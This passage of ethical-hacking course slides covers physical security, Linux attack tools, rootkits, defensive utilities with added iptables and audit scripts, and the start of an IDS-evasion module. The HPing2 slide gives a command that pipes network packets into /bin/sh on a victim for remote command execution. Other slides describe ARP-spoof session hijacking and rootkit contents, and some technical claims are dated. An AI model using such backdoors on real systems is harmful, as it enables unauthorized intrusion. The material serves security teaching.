  - Screens should be locked
  - Workstation layout design
  - PCs should be locked
  - Avoid removable media drives
Physical Security Checklist

© Wireless Access Points

 • If an intruder successfully connects to the firm's wireless access points, then he is virtually inside the LAN like any other employee of the firm.
 • To prevent such unauthorized access, the wireless access points should be secured.
 • The following guidelines should be followed:
  - Encryption should be enabled. This material names WEP, which has since been shown to be breakable in minutes; where the hardware supports it, WPA2 or later should be used instead.
  - The SSID should not be broadcast.
  - Access points should be password protected to gain entry.
  - Passwords should be strong enough that they won't be easy to crack.
Physical Security Checklist

© Other equipment such as fax, removable media, etc.

 • Such equipment should be secured by following these checks:
  - Fax machines near the reception area should be locked when the receptionist is not at the desk.
  - Faxes received should be filed properly rather than being handled carelessly.
  - Modems should not have auto-answer mode enabled.
  - Removable media should not be left in public places, and corrupted removable media should be physically destroyed.
Physical Security Checklist

© Access Control

 • Access control is used to prevent unauthorized access to any highly sensitive operational areas.
 • The various types of access control are:
  - Separation of work areas
  - Biometric access control
  - Entry cards
  - Mantraps
  - Facility sign-in procedures
  - Identification badges
Physical Security Checklist

© Biometric devices:

 • According to www.whatis.com, "Biometrics is the science and technology of measuring and statistically analyzing biological data."
 • Biometric devices consist of a reader or scanning device, software that converts the scanned information into digital form, and a location for the data to be analyzed, for instance a database that stores the biometric data for comparison with previous records.
 • The following methods are used by biometric devices for access control:
  - Fingerprints
  - Face scan
  - Iris scan
  - Voice recognition

Source: http://www.visionsphere.ca/
Physical Security Checklist

 • Smart cards:
  - According to whatis.com, a "smart card is a plastic card about the size of a credit card, with an embedded microchip that can be loaded with data, used for telephone calling, electronic cash payments, and other applications, and then periodically refreshed for additional use."
  - A smart card contains more information than a magnetic stripe card and it can be programmed for different applications.
Physical Security Checklist

 • Security Token:
  - According to the searchSecurity definition, "A security token is a small hardware device that the owner carries to authorize access to a network service."
  - Security tokens provide an extra level of assurance through a method known as two-factor authentication: the user has a personal identification number (PIN), which authorizes them as the owner of that particular device; the device then displays a number which uniquely identifies the user to the service, allowing them to log in.
Physical Security Checklist

© Computer Equipment Maintenance:

 • Appoint a person who will be responsible for looking after the computer equipment maintenance.
 • Computer equipment in the warehouse should also be accounted for.
 • The personnel of the AMC (annual maintenance contract) company should not be left alone when they come to the company for the maintenance of computer equipment.
 • The tool boxes and bags of the AMC company personnel should be thoroughly checked for any suspicious materials that could compromise the security of the firm.
Physical Security Checklist

© Wiretapping

 • According to www.freesearch.com, wiretapping is the action of secretly listening to other people's conversations by connecting a listening device to their telephone.
 • According to www.howstuffworks.com, "a wiretap is a device that can interpret these patterns as sound."
 • A few things can be done to make sure that no one is wiretapping:
  - Inspect all the data-carrying wires routinely.
  - Protect the wires using shielded cables.
  - Never leave any wire exposed.
© Remote Access

 • Remote access is an easy way for an employee of a firm to work from any place outside the company's physical boundaries.
 • Remote access to the company's networks should be avoided as much as possible.
 • It is easy for an attacker to remotely access the company's network by compromising the employee's connection.
 • The data being transferred during remote access should be encrypted to prevent eavesdropping.
 • Remote access is more dangerous than physical access, as the attacker is not in the vicinity and there is less possibility of catching him.
Physical Security Checklist

Locks

© Locks are used to restrict physical access to an asset.

© They are used on any physical asset that needs to be protected from unauthorized access, including doors, windows, vehicles, cabinets, equipment, etc.

© Different levels of security can be provided by locks depending on how they are designed and implemented.

© A lock has two modes - engaged/locked and disengaged/opened.
Locks (contd.)

© Locks are either mechanical or electrical:

 • Mechanical Locks
  - Mechanical locks have moving parts that operate without electricity.
  - There are two types of mechanical locks:
   - warded
   - tumbler
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Locks

• Electric Locks

- Electric locks work on electricity.

- Electric locks are comprised of electronic devices with scanners that identify users and computers that process codes.

- Electric locks are of the following types:

  - card access systems

  - electronic combination locks

  - electromagnetic locks

  - biometric entry systems

Source: www.wagoneers.com/.../electric-door-locks.jpg
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Spyware

Different Types of Spyware:

• Wireless video interceptor

• Smoke alarm video camera

• Night scope

• Mini dome camera
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Summary

© People should be appointed who would be accountable for any security breach in a firm.

© Physical security should be checked.

© All organizations should have a checklist for physical security as a part of their security check-ups.

© You cannot do anything to prevent natural disasters, but the loss can be decreased substantially if security policy is properly implemented.

© All the employees should take responsibility in handling security issues.
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Ethical Hacking

Module XVIII
Linux Hacking

Scenario

[print version] Hacked Gentoo Linux server taken offline | CNET News.com
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News.com

http://www.news.com/

Hacked Gentoo Linux server taken offline

By Patrick Gray
Special to CNET News.com
http://news.com.com/2100-734g-5113227.html
Story last modified December 4, 2003, 6:20 AM PST

Hackers have forced the Gentoo Linux project to take a server offline.

The attack and subsequent compromise comes after several machines belonging to the Debian Linux project were breached by attackers last month. A forensic analysis of the Debian machines revealed that no software packages or source code offered for download were affected, a claim now being made by Gentoo.
The maintainers of the Gentoo Linux distribution released a statement that describes the incident: "One of the servers that makes up the rsync.gentoo.org rotation was compromised via a remote exploit," it reads. "The compromised system had both an IDS and a file integrity checker installed and...we are reasonably confident that the portage tree stored on that box was unaffected."

The Gentoo team claimed that the breach was detected within approximately 1 hour.
"During this time, approximately 20 users synchronized against the portage mirror stored on this box. The method used to gain access to the box remotely is still under investigation. We will release more details once we have ascertained the cause of the remote exploit," the statement said.

The machine didn't actually belong to the project. It was donated by a sponsor, whose identity is so far undisclosed.

The Debian project servers were compromised by a previously unknown local vulnerability in the Linux kernel which has since been identified and rectified by a patch.

Patrick Gray of ZDNet Australia reported from Sydney.
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Module Objectives

© Why choose Linux?

© How to compile programs in Linux

© Linux security

© Linux a favorite among hackers

© Why is Linux hacked?

© Linux vulnerabilities in 2003

© Applying patches to programs

© Scanning in Linux

© Password cracking in Linux

© IP tables

© Linux IP chains

© SARA

© Linux Rootkits

© Rootkit countermeasures

© Linux Intrusion Detection systems

© Tools in Linux
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Module Flow

[Flow diagram: Why Linux? -> Linux Security -> Scanning in Linux -> Applying Patches to Programs -> Password Cracking in Linux -> Linux IP Tables -> Linux IP Chains -> SARA -> LIDS -> Rootkits]
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Why Linux?

© The majority of servers around the globe are running on Linux/Unix-like platforms

© Easy to get and easy on the pocket

© There are many types of Linux distributions/distros/flavors, such as: Red Hat, Mandrake, Yellow Dog, Debian, etc.

© Source code is available

© Easy to modify

© Easy to develop a program on Linux
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Linux Basics

© Aliased commands can pose a security threat if used without proper care

© Linux shell types: /sh, /ksh, /bash, /csh, /tcsh

© Linux user types, groups and permissions

© Overview of Linux signals, logging and /etc/security
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Chrooting

© Linux is an open source Operating System with many vendors providing different security options.

© Unlike other OSs, Linux is not secure.

© Linux is optimized for convenience and doesn't make security easy or natural.

© The security on Linux will vary from user to user.

© Linux security is effectively binary: all or nothing in terms of power. Facilities such as setuid execution tend to give way in the middle.
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Why is Linux Hacked?

© Linux is widely used on a large number of servers in the world, making it a 'de facto' backbone.

© Since application source code is available, it is very easy to find out the vulnerabilities of the system.

© Many applications on Linux are installed by default, so they are more vulnerable to attacks. Since the applications are open source, they may have bugs associated with them.

© There are too many default installed daemons.

• The admin must remove unused daemons

• Change the /etc/rc.d files and the /etc/inetd.conf file

© There are too many default installed setuid programs.
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Linux Vulnerabilities in 2003

© Vulnerabilities were announced in many packages, including

• apache, balsa, bind, bugzilla, cdrecord, cfengine

• cron, cups, cvs, ethereal (many), evolution, exim, fetchmail (many), fileutils

• gdm, ghostscript, glibc, gnupg, gzip, hylafax, inetd, iproute, KDE, kerberos, Kernel

• lprng, lsh, lynx, mailman, man, mozilla, mpg123, mplayer, mutt, MySQL, openssh, openssl

• perl, pine, PHP, postfix, PostgreSQL, proftpd, python, rsync, samba, screen, sendmail, snort, stunnel, sudo, tcpdump, vim, webmin, wget, wu-ftpd, xchat, XFree86, xinetd, xpdf, and zlib
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How to Apply Patches to Vulnerable Programs

© Check the Linux distribution homepage, e.g., Red Hat, Debian, Alzza, and so on

© Go to the respective websites of the vendors from whom the user has bought the program and download the patches
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Scanning Networks

© Once the IP address of a target system is known, an attacker can begin the process of port scanning, looking for holes in the system through which the attacker can gain access

© A typical system has 2^16 - 1 port numbers, with one TCP port and one UDP port for each number

© Each one of these ports is a potential way into the system

© The most popular scanning tool for Linux is Nmap
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Scanning Tool: Nessus

© One essential type of tool for any attacker, or defender, is the vulnerability scanner.

© These tools allow the attacker to connect to a target system and check for such vulnerabilities as configuration errors, default configuration settings that allow attackers access, and the most recently reported system vulnerabilities.

© The preferred open-source tool for this is Nessus.

© Nessus is an extremely powerful network scanner. It can also be configured to run a variety of attacks.



Nessus portscanning/attack status 



grincheuK.l 



prof.fr.rie53U3.org 



gate\i'a/.fr 



Fortscan : 
Attack ; 
Secuhtv check : 



[ Stop 



infosrch.cgi 



Fort3C3in : 
Attack : 
Security" check : 



Stop 



Netscape Server ?PageService3 bug 



Portscan : 
Attack : 
Security check : 



Stop 



mstream agent Detect 



Portscan : 
Attack : 
Security check : 



Quote of the da^ 



bonsai. fr.nes3U3.org 



Portscan : 
Attack : 
Security check : 



SMB use domain SID to enumerate users 



Stop the whole test 
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Tool: Cheops

[Screenshot: Cheops Network User Interface (File / Page / Help menus), showing a map of discovered hosts and subnets with their IP addresses; status line "Saved /root/.cheops-map"]
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Port Scan Detection Tools

© KLAXON

© Scanlogd - detects and logs TCP port scans

http://www.openwall.com/scanlogd/

Scanlogd only logs port scans. It does not prevent them. The user will only receive summarized information in the system's log.

© Psionic PortSentry

http://www.psionic.com/products/portsentry/

The portscan detection daemon, PortSentry, has the ability to detect port scans (including stealth scans) on the network interfaces of the user's server. Upon alarm, it can block the attacker via hosts.deny, a dropped route, or a firewall rule.
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Password Cracking in Linux

© Xcrack (http://packetstorm.linuxsecurity.com/Crackers/)

© It finds any passwords that match words in the dictionary file the user provides, but it won't apply any combinations or modifications of those words

© It is a comparatively fast tool
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IPChains

© A rewrite of the Linux IPv4 firewalling code, and of ipfwadm, which was a rewrite of BSD's ipfw. It is required to administer the IP packet filters in Linux kernel versions 2.1.102 and above.

© The older Linux firewalling code doesn't deal with fragments, has 32-bit counters, doesn't allow specification of protocols other than TCP, UDP or ICMP, cannot make large changes atomically, cannot specify inverse rules, has some quirks, and can be tough to manage.
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IPTables

© IPTables is the replacement for the userspace tool ipchains in the Linux 2.4 kernel and beyond. IPTables has many more features than IPChains:

© Connection tracking capability, i.e., the ability to do stateful packet inspection.

© Simplified behavior of packets negotiating the built-in chains (INPUT, OUTPUT and FORWARD).

© A clean separation of packet filtering and network address translation (NAT).

© Rate-limited connection and logging capability.

© The ability to filter on TCP flags and TCP options, and also MAC addresses.
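The features listed above, shown together in an added example that is not code from the courseware: a small shell script that builds a stateful iptables INPUT policy using connection tracking, the built-in chains, rate-limited logging, TCP-flag matching and MAC matching. The interface, address and MAC values are constructed placeholders, and the script assumes a filter table with no existing LOGDROP chain.

```shell
#!/bin/sh
# Added example, not code from the courseware: a minimal stateful iptables INPUT
# policy exercising the iptables features listed on the slide. Interface, address
# and MAC below are constructed placeholders; the script assumes the filter table
# has no LOGDROP chain yet.
IPT="${IPT:-iptables}"
WAN_IF="${WAN_IF:-eth0}"
ADMIN_IP="${ADMIN_IP:-192.0.2.10}"            # RFC 5737 documentation address
ADMIN_MAC="${ADMIN_MAC:-00:11:22:33:44:55}"   # placeholder MAC of the admin host

# Emit the policy, one iptables argument list per line, in application order.
firewall_rules() {
    cat <<EOF
-P INPUT DROP
-P FORWARD DROP
-P OUTPUT ACCEPT
-F INPUT
-N LOGDROP
-A LOGDROP -m limit --limit 5/min --limit-burst 10 -j LOG --log-prefix FW-DROP:
-A LOGDROP -j DROP
-A INPUT -i lo -j ACCEPT
-A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
-A INPUT -m conntrack --ctstate INVALID -j LOGDROP
-A INPUT -p tcp ! --syn -m conntrack --ctstate NEW -j LOGDROP
-A INPUT -p tcp --tcp-flags ALL NONE -j LOGDROP
-A INPUT -p tcp --tcp-flags ALL ALL -j LOGDROP
-A INPUT -i $WAN_IF -p tcp --dport 22 -s $ADMIN_IP -m mac --mac-source $ADMIN_MAC -m conntrack --ctstate NEW -j ACCEPT
-A INPUT -i $WAN_IF -p tcp --dport 22 -m conntrack --ctstate NEW -j LOGDROP
-A INPUT -i $WAN_IF -p tcp --dport 80 -m conntrack --ctstate NEW -m limit --limit 50/sec --limit-burst 100 -j ACCEPT
-A INPUT -j LOGDROP
EOF
}

# Apply the rules in order; stop at the first failure so a half-built policy is
# reported rather than silently left in place. Needs root when IPT is iptables.
apply_firewall() {
    firewall_rules | while IFS= read -r rule; do
        # word-splitting $rule into separate arguments is intended here
        $IPT $rule || { echo "failed: $IPT $rule" >&2; exit 1; }
    done
}

# Number of rules that end in the logging drop; a quick sanity check of the policy.
count_logdrop_rules() {
    firewall_rules | grep -c -- '-j LOGDROP$'
}
```

Run with `IPT=echo ./firewall.sh` style overrides to review the generated commands before applying them as root.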
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Differences Between ipchains and ipfwadm

© Many arguments have been remapped: capitals now indicate a command, and lower case indicates an option

© Arbitrary chains are supported, so even built-in chains have full names instead of flags (e.g., 'input' instead of '-I')

© The '-k' option has vanished: use '! -y'

© The '-b' option actually inserts/appends/deletes two rules, rather than a single 'bidirectional' rule

© The '-b' option can be passed to '-C' to do two checks (one in each direction)

© The '-x' option to '-l' has been replaced by '-v'
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How to Organize and Alter Firewall Rules

© Minimize the number of rule-checks for the most common packets

© If there is an intermittent link, say a PPP link, the user might want to set the first rule in the input chain to '-i ppp0 -j DENY' at boot time, then have something like this in his ip-up script:

    # Re-create the 'ppp-in' chain.
    ipchains-restore -f < ppp-in.firewall
    # Replace the DENY rule with a jump to the ppp-handling chain.
    ipchains -R input 1 -i ppp0 -j ppp-in

The user's ip-down script would look like:

    ipchains -R input 1 -i ppp0 -j DENY
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SARA (Security Auditor's Research Assistant)

http://www-arc.com/sara

© The Security Auditor's Research Assistant (SARA) is a third generation Unix-based security analysis tool that supports the FBI Top 20 Consensus on Security

© SARA operates on most Unix-type platforms including Linux and Mac OS X

© SARA is the upgrade of the SATAN tool

© Getting SARA up and running is a straightforward compilation process, and the rest is done via a browser
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Tool: Sniffit

http://reptile.rug.ac.be/~coder/sniffit/sniffit.html

© Sniffit is one of the most famous, and fastest, Ethernet sniffers for Linux

© The user can run it either on the command line, with optional plug-ins and filters, or in interactive mode, which is the preferred mode

© The interactive mode of Sniffit allows the user to monitor connections in real time and, therefore, sniff in real time too

Note: Remember to download the patch and then recompile Sniffit, for optimum results
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Hacking Tool: HPing2

http://www.hping.org

© Hping2 is a command-line oriented TCP/IP packet assembler/analyzer

© More commonly known for its use as a pinging utility, HPing2 carries a hidden but handy usage, that is, a backdoor trojan

© Just enter the following command on the victim

    $ ./hping2 -I eth0 -9 ecc | /bin/sh

Then telnet into any port of the victim and invoke commands remotely on the victim's host by preceding any Unix/Linux commands with ecc

    $ telnet victim.com 80

    $ eccecho This text imitates a trojan shovel
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Tool: Hunt

http://lin.fsid.cvut.cz/~kra/index.html

© One of Hunt's advantages over other session hijacking tools is that it uses techniques to avoid ACK storms.

© Hunt avoids the ACK storm, and the dropping of the connection, by using ARP spoofing to establish the attacker's machine as a relay between Source and Destination.

© Now the Attacker uses Hunt to sniff the packets the Source and Destination send over this connection. The Attacker can choose to act as a relay and forward these packets to their intended destinations, or he can hijack the session.

© The attacker can type in commands that are forwarded to a Destination but that the Source can't see. Any commands the Source types in can be seen on the Attacker's screen, but they are not sent to the Destination. Then Hunt allows the attacker to restore the connection back to the Source when he/she is done with it.
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Tool: TCP Wrappers

© Allows the user to monitor/filter incoming requests for SYSTAT, FINGER, FTP, TELNET, R-commands, TFTP, TALK, and other network services

© Provides access control to restrict what systems connect with which network daemons

© Provides some protection from host spoofing

© Has 4 components, namely:

• tcpd - the actual wrapper program

• tcpdmatch, tcpdchk - ACL testing programs

• try-from - tests the host lookup function

• safe_finger - a better version of finger
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Linux Loadable Kernel Modules

© LKMs are Loadable Kernel Modules used by the Linux kernel to expand its functionality

© The advantage of those LKMs: they can be loaded dynamically; there must be no recompilation of the whole kernel. Because of these features, they are often used for specific device drivers (or filesystems) such as soundcards, etc.

© This command forces the system to do the following things:

• Load the object file (here module.o)

• Call the create_module system call (for system calls -> see 1.2) for relocation of memory

• Unresolved references are resolved by kernel symbols with the system call get_kernel_syms

• After this, the init_module system call is used for the LKM initialisation -> executing int init_module(void), etc.
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Hacking Tool: Linux Rootkits

© One way an intruder can maintain access to a compromised system is by installing a rootkit

© A rootkit contains a set of tools and replacement executables for many of the operating system's critical components, used to hide evidence of the attacker's presence and to give the attacker backdoor access to the system

© Rootkits require root access to install, but once set up, the attacker can get root access back at any time
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Rootkits: Knark, Torn

© Knark:

• The following is the list of files that come along with Knark:

Makefile, apache.c, Apache.cgi, backup, Bj.c, caine, Clearmail, dmesg, Dmsg, ered, Exec, fix, Fixtext, ftpt, Gib, gib.c, HdsO, hidef, Inch, init, Lesa, login, Lpdx, lpdx.c, Make-ssh-host-key, make-ssh-known-hosts, Module, nethide, Pgr, removeme, Rexec, rkhelp, sl2, sl2.c, snap, Ssh_config, sshd_config, Ssht, statdx2, Sysmod.o, sz, T666, unhidef, Wugod, zap

• KNARK comes with a few good exploits as well, such as Lpdx, T666, Wugod

• First rootkit of its kind that is precompiled and yet allows the user to define a password; the password is stored in an external encrypted file

© Torn:

EC-Council
Copyright © by EC-Council
All Rights reserved. Reproduction is strictly prohibited

Rootkits: Tuxit, Adore, Ramen

© Tuxit

• Written by a Dutch group called Tuxtendo.

• There are six files in the tuxkit, which include a README, an installation script, and four tarred/zipped files.

© Adore

• Adore is a worm that was originally known as the Red Worm.

• LPRng is installed by default on Red Hat 7.0 systems. From the reports so far, Adore started to spread from April X, 2001

© Ramen

• It is a Linux-based Internet worm named after the popular noodle soup.

• It has been seen in the wild affecting systems that run Red Hat Inc.'s 6.2 or 7.0 versions of the open-source OS.
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Rootkit: Beastkit

© Beastkit 7.0 replaces common binaries that can be used to monitor system operations (like ps) and the list of programs included in the rootkit (bin.tgz)

© The timestamp does not change, because the rootkit uses touch -acmr to transmit the timestamp to the rootkit files

© Beastkit contains some tools (bktools) (placed at /lib/ldd.so/bktools):

• bkget - SynScan daemon (by psychoid/tCl)

• bkp - hdlp2 version 2.05

• bks - Sniffer

• bksb - "sauber" script (see the duarawkz rootkit), cleans up some of the intruder's traces

• bkscan - SynScan (by psychoid/tCl)

• bktd

• patch - SSHd patch script (update to ssh-1.2.32 using ftp)

• pri - SSHd patch script (update to ssh-1.2.32 using http)

• prw - SSHd patch script (update to ssh-1.2.32)
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Rootkit Countermeasures

© chkrootkit is a tool to locally check for signs of a rootkit

© It contains chkrootkit, a shell script that checks system binaries for rootkit modification

chkrootkit

http://www.chkrootkit.org/
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chkrootkit Detects the Following Rootkits

1. lrk3, lrk4, lrk5, lrk6 (and some variants);
2. Solaris rootkit;
3. FreeBSD rootkit;
4. t0rn (including some variants and t0rn v8);
5. Ambient's Rootkit for Linux (ARK);
6. Ramen Worm;
7. rh[67]-shaper;
8. RSHA;
9. Romanian rootkit;
10. RK17; Lion Worm;
11. Adore Worm;
12. LPD Worm;
13. kenny-rk;
14. Adore LKM;
15. ShitC Worm;
16. Omega Worm;
17. Wormkit Worm;
18. Maniac-RK;
19. dsc-rootkit;
20. Ducoci rootkit;
21. x.c Worm;
22. RST.b trojan;
23. duarawkz;
24. knark LKM;
25. Monkit;
26. Hidrootkit; Bobkit;
27. Pizdakit;
28. t0rn (v8.0 variant);
29. Showtee;
30. Optickit;
31. T.R.K;
32. MithRa's Rootkit;
33. George;
34. SucKIT;
35. Scalper (FreeBSD/Apache chunked encoding worm);
36. Slapper A, B, C and D (Linux/Apache mod_ssl Worm);
38. OpenBSD rk v1;
39. Illogic rootkit;
40. SK rootkit;
41. sebek LKM;
42. Romanian rootkit;
43. LOC rootkit;

chkrootkit
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Linux Tools: Application Security

© Whisker (http://www.wiretrip.net)

Rain Forest Puppy's excellent CGI vulnerability scanner.

© Flawfinder (http://www.dwheeler.com/flawfinder/)

Flawfinder is a Python program that searches through source code for potential security flaws, listing potential security flaws sorted by risk, with the most potentially dangerous flaws shown first. The risk level depends not only on the function, but on the values of the parameters of the function.

© StackGuard (http://www.immunix.org)

StackGuard is a compiler that emits programs hardened against "stack smashing" attacks. Stack smashing attacks are a common form of penetration attack. Programs that have been compiled with StackGuard are largely immune to stack smashing attacks. Protection requires no source code changes at all.

© Libsafe (http://www.avayalabs.com/project/libsafe/index.html)

It is generally accepted that the best solution to buffer overflow and format string attacks is to fix the defective programs.
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Linux Intrusion Detection System (LIDS)

© LIDS is an enhancement for the Linux kernel, written by Xie Huagang and Philippe Biondi

© It implements several security features, such as mandatory access controls (MAC), a port scan detector, file protection (even from root), and process protection

© LIDS can be downloaded at http://www.lids.org/
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Advanced Intrusion Detection Environment (AIDE)

© AIDE (Advanced Intrusion Detection Environment) is a free replacement for Tripwire

© It creates a database from the regular expression rules that it finds in the config file

© Once this database is initialized, it can be used to verify the integrity of the files

© This first AIDE database is a snapshot of the system in its normal state and the yardstick by which all subsequent updates and changes will be measured
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Linux Tools: Security Testing Tools

© Nmap (http://www.insecure.org/nmap)

Premier network auditing and testing tool

© LSOF (ftp://vic.cc.purdue.edu/pub/tools/unix/lsof)

LSOF lists open files for running Unix/Linux processes

© Netcat (http://www.atstake.com/research/tools/index.html)

Netcat is a simple Unix utility that reads and writes data across network connections, using the TCP or UDP protocol

© Hping2 (http://www.kyuzz.org/antirez/hping/)

Hping2 is a network tool able to send custom ICMP/UDP/TCP packets and to display target replies like ping does with ICMP replies

© Nemesis (http://www.packetninja.net/nemesis/)

The Nemesis Project is designed to be a command-line based, portable human IP stack for Unix/Linux
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Linux Tools: Encryption

© Stunnel (http://www.stunnel.org)

Stunnel is a program that allows the user to encrypt arbitrary TCP connections inside SSL (Secure Sockets Layer), available on both Unix and Windows. Stunnel can allow the user to secure non-SSL-aware daemons and protocols (like POP, IMAP, NNTP, LDAP, etc.) by having Stunnel provide the encryption, requiring no changes to the daemon's code.

© OpenSSH/SSH (http://www.openssh.com/)

SSH (Secure Shell) is a program for logging into a remote machine and for executing commands on a remote machine. It provides secure encrypted communications between two untrusted hosts over an insecure network.

© GnuPG (http://www.gnupg.org)

GnuPG is a complete and free replacement for PGP. Since it does not use the patented IDEA algorithm, it can be used without any restrictions.
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Linux Tools: Log and Traffic Monitors

© MRTG (http://www.mrtg.org)

The Multi-Router Traffic Grapher (MRTG) is a tool to monitor the traffic load on network links.

© Swatch (http://www.stanford.edu/~atkins/swatch/)

Swatch, the simple watch daemon, is a program for Unix system logging.

© Timbersee (http://www.fastcoder.net/~thumper/software/sysadmin/timbersee/)

Timbersee is a program very similar to the Swatch program.

© Logsurf (http://www.cert.dfn.de/eng/logsurf/)

The program logsurfer was designed to monitor any text-based logfiles on the system in real time.

© TCP Wrappers (ftp://ftp.porcupine.org/pub/security/index.html)

Wietse Venema's network logger, also known as TCPD or LOG_TCP. These programs log the client hostname of incoming telnet, ftp, rsh, rlogin, finger, etc. requests.
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Linux Tools: Log and Traffic Monitors (contd.)

© IPLog (http://ojnk.sourceforge.net/)

iplog is a TCP/IP traffic logger. Currently, it is capable of logging TCP, UDP, and ICMP traffic.

© IPTraf (http://cebu.mozcom.com/riker/iptraf/)

IPTraf is an ncurses-based IP LAN monitor that generates various network statistics including TCP info, UDP counts, ICMP, OSPF information, Ethernet load info, node stats, IP checksum errors, and others.

© Ntop (http://www.ntop.org)

ntop is a Unix/Linux tool that shows network usage, similar to what the popular "top" Unix/Linux command does.
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Linux Security Auditing Tool (LSAT)

© It is a post-install security auditor for Linux and Unix

© It checks the system configuration and local network settings on the system for common security/config errors and for packages that are not needed

© LSAT consists of the following modules:

• checkcfg, checkdotfiles, checkfiles, checkftpusers, checkhostsfiles, checkinetd, checkinittab, checkissue, checkkbd, checklimits, checklogging, checkmodules, checkmd5, checknet, checknetforward, and checkset, to name a few
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Linux Security Countermeasures

Physical Security:

Lock your computer physically in a secure place.

Password Security:

Do not assign easy-to-guess passwords.

Do not share your account with another person.

Check for user accounts with a null password (without passwd) in /etc/shadow.

Network Security:

Close the door first by denying access from the network, by default.

    $ echo "ALL: ALL" >> /etc/hosts.deny

Stop all unused services such as sendmail, NFS.

    $ chkconfig --list

    $ chkconfig --del sendmail

    $ chkconfig --del nfslock

    $ chkconfig --del rpc

Check system logs in /var/log regularly, especially /var/log/secure.

Update your Linux system regularly.

Check the errata (bug fixes) at http://www.redhat.com/support/errata

The update packages can be found at ftp://updates.redhat.com
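The password and network checks above, and the "remove unused daemons" advice from the "Why is Linux Hacked?" slide, as an added example that is not code from the courseware: three offline checks that take file paths as arguments, run here against constructed sample files (not real system files) and usable against the real /etc files on a host.

```shell
#!/bin/sh
# Added example, not code from the courseware: offline audit checks mirroring the
# countermeasure slide. Each function reads the file it is given, so the same code
# runs against the constructed samples below or against /etc/shadow, /etc/hosts.deny
# and saved "chkconfig --list" output on a real host.

# Print login names whose password field in a shadow-format file is empty
# (a null password lets anyone log in without a passphrase).
null_password_accounts() {
    awk -F: '$2 == "" { print $1 }' "$1"
}

# Return 0 when the hosts.deny file carries a default "ALL: ALL" rule
# (comments and blank lines ignored), 1 otherwise.
hosts_deny_has_default() {
    grep -v '^[[:space:]]*#' "$1" \
        | grep -Eq '^[[:space:]]*ALL[[:space:]]*:[[:space:]]*ALL([[:space:]]|$)'
}

# From saved "chkconfig --list" output (name 0:off 1:off 2:on 3:on ...), print the
# services named on the command line that are still on in runlevel 3.
unwanted_services_on() {
    listing="$1"; shift
    for svc in "$@"; do
        awk -v s="$svc" '$1 == s && $5 == "3:on" { print $1 }' "$listing"
    done
}

# Constructed sample inputs (hashes and service names are made up for the demo).
make_samples() {
    dir=$(mktemp -d)
    cat >"$dir/shadow" <<'EOF'
root:$6$saltsalt$hashedhashedhashed:19000:0:99999:7:::
guest::19000:0:99999:7:::
backup:!!:19000:0:99999:7:::
legacy::19000:0:99999:7:::
EOF
    cat >"$dir/hosts.deny" <<'EOF'
# hosts.deny  This file describes the names of the hosts which are
#             *not* allowed to use the local INET services
ALL: ALL
EOF
    cat >"$dir/chkconfig.txt" <<'EOF'
sendmail        0:off   1:off   2:on    3:on    4:on    5:on    6:off
nfslock         0:off   1:off   2:off   3:on    4:on    5:on    6:off
sshd            0:off   1:off   2:on    3:on    4:on    5:on    6:off
rpc             0:off   1:off   2:off   3:off   4:off   5:off   6:off
EOF
    echo "$dir"
}

# Run all checks against a directory holding shadow, hosts.deny and chkconfig.txt.
audit_dir() {
    d="$1"
    echo "accounts with null password: $(null_password_accounts "$d/shadow" | tr '\n' ' ')"
    if hosts_deny_has_default "$d/hosts.deny"; then
        echo "hosts.deny: default deny present"
    else
        echo "hosts.deny: WARNING no 'ALL: ALL' default"
    fi
    echo "unwanted services on in runlevel 3: $(unwanted_services_on "$d/chkconfig.txt" sendmail nfslock rpc | tr '\n' ' ')"
}

audit_dir "$(make_samples)"
```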
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Summary

© Linux is gaining in popularity and is fast becoming a stable industry-strength OS

© Once the IP address of a target system is known, an attacker can begin port scanning, looking for holes in the system for gaining access, Nmap being a popular tool

© Password cracking tools are available for Linux as well

© Sniffers, as well as packet assembly/analyzing tools for Linux, provide attackers with the edge that they have when dealing with other OSs

© Attackers with root privileges can engage in session hijacking as well

© Trojans, backdoors, and worms are also prevalent in the Linux environment

© As with any other system, a well-developed integrated procedure is to be put in place to counter the threats that exist
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Ethical Hacking

Module XIX
Evading IDS, Firewalls, and Detecting Honeypots

Scenario

News spread in the cracker community!!!!

"A vulnerability in the web server of a famous security site"

Quiz wanted to have backdoor access to the security site to be kept apprised of the latest patches that the site was providing to the online community.

Using various hacking tools, Quiz hacked the web server. Quiz was delighted!!!

However, James, the Information Security Advisor of the security site, fooled Quiz through a honeypot.
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Module Objectives

© Introduction to Intrusion Detection Systems

© Ways to detect an intrusion

© Types of IDS

© What are System Integrity Verifiers?

© Detection of attack by an IDS

© Different ways to evade IDS

© Tools to evade IDS

© Firewall and its identification

© Bypassing the firewall

© Tools to bypass a firewall

© Honeypot and its types

© Detection of honeypots
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Module Flow

[Flow diagram: What is IDS? -> Intrusion -> Types of IDS -> IDS Tools -> Ways to Evade IDS -> Tools to Evade IDS -> IDS Evasion -> Firewall -> Firewall Vendors -> Firewall Evasion -> Honeypot -> Types of Honeypots -> Honeypots -> Countermeasures]
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© Attackers/hackers are always on the prowl to compromise networks

© Customizing the settings will help in preventing easy access for hackers

© IDS, firewalls, and honeypots are important technologies which deter an attacker from compromising the network
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Terminology

© Intrusion Detection System (IDS)

• An IDS inspects all inbound and outbound network activity and identifies suspicious patterns that indicate an attack to compromise a system

© Firewall

• A firewall is simply a program or hardware device that protects the resources of a private network from users of other networks

© Honeypot

• A honeypot is a device intended to be compromised. The goal of setting up a honeypot is to have the system probed, attacked, and potentially exploited
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Intrusion Detection Systems (IDS)

© An intrusion detection system (IDS) gathers and analyzes information from various areas within a computer or a network to identify possible violations of security policy, including unauthorized access as well as misuse

© IDS are also referred to as "packet sniffers," which intercept packets traveling along various communication mediums and protocols, usually TCP/IP

© The packets are analyzed in a number of different ways after they are captured

© An IDS evaluates a suspected intrusion once it has taken place and signals an alarm
Ways to Detect an Intrusion

© There are three ways to detect an intrusion:

• Signature recognition

- Also known as misuse detection, signature recognition compares observed events against a database of patterns of known attacks

• Anomaly detection

- Anomaly detection differs from signature recognition in the subject of the model: it builds a profile of normal activity and flags deviations from it, so it can catch unknown attacks but produces more false positives

• Protocol anomaly detection

- In this type of detection, models are built from the TCP/IP protocol specifications, and traffic that violates those specifications is flagged
Types of Intrusion Detection Systems

© There are two basic types of IDS:

• Network-based IDS

- In a network-based system, or NIDS, the individual packets flowing through a network are analyzed

- An NIDS is responsible for detecting anomalous, inappropriate, or other data that may be considered unauthorized occurring on a network

• Host-based IDS

- In a host-based system, or HIDS, the IDS examines the activity on each individual computer or host

